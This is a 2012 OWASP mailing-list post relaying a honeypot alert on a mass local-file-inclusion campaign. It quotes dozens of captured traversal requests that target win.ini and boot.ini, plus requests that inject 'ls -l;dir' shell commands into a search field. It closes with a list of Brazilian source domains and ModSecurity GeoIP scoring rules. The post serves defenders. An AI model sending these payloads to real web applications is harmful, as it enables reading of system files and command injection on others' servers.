[Owasp-natal] [Honeypot Alert] Large Scale LFI Attack From Brazillian Domains

Noilson Caio caiogore em gmail.com
Quinta Março 22 16:18:47 UTC 2012


Our web sensors picked up a big uptick in Local File Inclusion (LFI)
attacks today.  We received 3675 attacks that targeted a wide range of
applications all attempting to use directory traversals to access:
Windowswin.ini
boot.ini
 Here is a sampling of attack payloads:
GET
/forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET
/forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET
/forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET
/sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
GET
/sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET
/sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET
/wp-trackback.php?p=..........................................Windowswin.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET
/forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET
/index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET
/index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=site_map&zenid=/boot.ini%00

GET
/index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=featured_products&zenid=/boot.ini%00

GET
/index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00

GET
/index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00

GET
/index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00

GET
/index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=privacy&zenid=/boot.ini%00

GET
/index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=conditions&zenid=/boot.ini%00

GET
/wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00

GET
/forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00

GET
/index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=contact_us&zenid=/boot.ini%00

GET
/index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=site_map&zenid=/boot.ini%00

GET
/index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=gv_faq&zenid=/boot.ini%00

GET
/index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00

GET
/index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00

GET
/index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=reviews&zenid=/boot.ini%00

GET
/index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00

GET
/index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00

GET
/index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=specials&zenid=/boot.ini%00

GET
/index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00

GET
/index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00

GET
/index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00

GET
/index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=login&zenid=/boot.ini%00

GET
/index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00

GET
/index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=featured_products&zenid=/boot.ini%00

GET
/index.php?showtopic=..........................................Windowswin.ini%00

GET
/index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00

GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00


We identified this attack through two methods of our commercial rules feed:
LFI virtual patching rules
A big increase in unique malicious IP addresses (for our IP Reputation
Feed).  We normally have between 500-800 IP addresses in our list per-day.
Today's IP Reputation Blacklist jumped up to 2339.
After analyzing the source IP addresses, it was clear that this LFI attack
campaign was orchestrated by attacker(s) in Brazil.  Here is a listing of
the Brazillian domains we identified:
ac.gov.br
aerotelecom.com.br
ampernet.com.br
atena.anhembi.ind.br
brma.santacasasp.org.br
cable.cabotelecom.com.br
cable.infolic.com.br
certelnet.com.br
cianetwork.com.br
claro.net.br
cpnet.com.br
customer.tdatabrasil.net.br
customer.telesp.net.br
dedicated.neoviatelecom.com.br
ded.intelignet.com.br
ded.srt.net.br
desktop.com.br
dezinternet.com.br
dial-up.telesp.net.br
din.wln.net.br
dsl.brasiltelecom.net.br
dsl.ccoce700.brasiltelecom.net.br
dsl.pmjce700.brasiltelecom.net.br
dsl.telesp.net.br
dynamic.adsl.gvt.net.br
dynamic.conectcor.com.br
dynamic.dialup.gvt.net.br
dynamic.idial.com.br
dynamic.neoviatelecom.com.br
e.brasiltelecom.net.br
e.ccoce700.brasiltelecom.net.br
e.pmjce700.brasiltelecom.net.br
fia.com.br
fw-cruz2.mma.com.br
gaccbahia.sdr.gvt.net.br
gate.futurecomp.com.br
geoposition.com.br
gw-acad-pf.upf.br
hc-gw.unicamp.br
host.gvt.net.br
http.kraftweb.com.br
ibys.com.br
i-next.psi.br
intercampo.com.br
interline.net.br
ip18.unb.org.br
ipd.brasiltelecom.net.br
ipd.brcentral.net.br
isa2.eptv.com.br
isp.timbrasil.com.br
itake.net.br
jupiter.sulpol.com.br
kratos.tdkom.psi.br
mail01.fundacaoaltinoventura.org.br
mail2.metroval.com.br
mail6.aralco.com.br
mail.aralco.com.br
mail.centraldopapel.com.br
mail.hci.ind.br
mail.nardini.ind.br
marinter.com.br
marte.ceron.com.br
mhnet.com.br
minasmaistelecom.com.br
mobile.jabursat.com.br
mx.0.rossi.com.br
neowave.com.br
nereu.vipway.net.br
nqt.com.br
ns1.vipel.ind.br
ns.argosguindastes.com.br
osprey2.certelnet.com.br
osprey.certelnet.com.br
p4net.com.br
poolip.BHE.embratel.net.br
prontonet.com.br
provale.com.br
proxy1.recife.pe.gov.br
rco.gvt.net.br
res-com.wayinternet.com.br
res-com.wayinternet.com.br
rline.com.br
sercomtel.com.br
server.smsr.com.br
servidor1.actioncentro.net.br
speedycti.com.br
srv.tecnolab.com.br
static.ctbctelecom.com.br
static.gotelecom.com.br
static.gvt.net.br
static.impsat.net.br
static.ntbr.com.br
static-pr082.redetelesul.com.br
static.spo.ctbc.com.br
static.starweb.net.br
static.stech.net.br
static-stz.convex.com.br
tcvnet.com.br
telemar.net.br
tpa.net.br
tpnet.psi.br
ufpa.br
uninetbsb.com.br
unotel.com.br
user.ajato.com.br
user.dynamic.dipelnet.com.br
user.superilinhares.com.br
user.superitelecom.com.br
user.veloxzone.com.br
user.vivozap.com.br
v4.naclick.com.br
veiculos.jelta.com.br
viacaboip.com.br
viaembratel.net.br
viafibra.com.br
virtua.com.br
wcs.net.br
web.ceralpisos.com.br
webmail.ro.senac.br
wifi.tcheturbo.com.br
wlan.lpnet.com.br
www2.ceralpisos.com.br
xd-dynamic.ctbcnetsuper.com.br
xdsl-dinamico.ctbcnetsuper.com.br
 Assigning Risk Scores
If you are using ModSecurity to protect your web applications, and your
user-base does not normally originate in Brazil, you may want to consider
implementing some GeoIP rules to help raise the potential Threat Score.
SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat

SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"

SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk
Source Location',setvar:tx.threat_score=+10"
This would raise the Threat Score for this transaction.  You could,
however, even block based solely on this information if you were sure that
you have no legitimate clients from this geographic location.  Simply
change the "pass" action to "block".

-- 
" Eu quero saber como renomear um arquivo " ele diz.
Por favor, é dia de pagamento, não é?! Mas eu estou de bom humor.
" Claro. Basta dar 'rm' e o nome do arquivo "
" Obrigado "

Noilson Caio T. de Araújo
Linux Professional Institute Certification
LPI000182893
Novell Certified Linux Administrator (CLA)
10111916
Novell Data Center Technical Specialist
http://ncaio.ithub.com.br
http://www.commandlinefu.com/commands/by/ncaio
http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-natal/attachments/20120322/af172aa8/attachment-0001.html>


More information about the Owasp-natal mailing list